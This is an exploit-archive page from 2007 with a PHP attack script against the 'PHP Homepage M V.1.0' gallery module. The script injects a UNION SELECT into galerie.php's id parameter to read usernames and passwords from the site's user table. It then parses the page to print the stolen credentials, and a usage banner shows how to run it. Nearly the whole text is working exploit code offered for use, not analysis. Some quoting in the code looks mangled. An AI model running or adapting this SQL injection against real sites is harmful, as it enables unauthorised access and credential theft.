Home / exploits phphome-sql.txt
Posted on 09 October 2007
<?php if ($argv[1] == '') { echo "--PHP Homepage M V.1.0 galerie.php Exploit---- "; echo "only with magic_quotes_gpc OFF "; echo "by [PHCN] Mahjong "; echo "Usage : phpHPmv1.php http://127.0.0.1 / 1 "; echo '----------------------------------------------'; } else { $host = $argv[1]; $path = $argv[2]; $userid = $argv[3]; $data = $host.$path."galerie.php?act=show&id=99999'+UNION+SELECT+username,passwort,passwort,passwort+FROM+user+WHERE+U ID='$userid"; $data = file_get_contents($data); $pw = substr($data,strpos($data,'<img border="0" src='bilder/')+28,30); $pw = explode('.',$pw); $pw = $pw[0]; $user = substr($data,strpos($data,'UID=''.$userid.''<h1 align="center">',30)); $user = explode('>',$user); $user = strrev($user[1]); $user = substr($user,4,100); $user = strrev($user); echo "--EXPLOIT FINISHED-- "; echo "userid : $userid "; echo "username: $user "; echo "password: $pw "; echo '--------------------'; } ?>
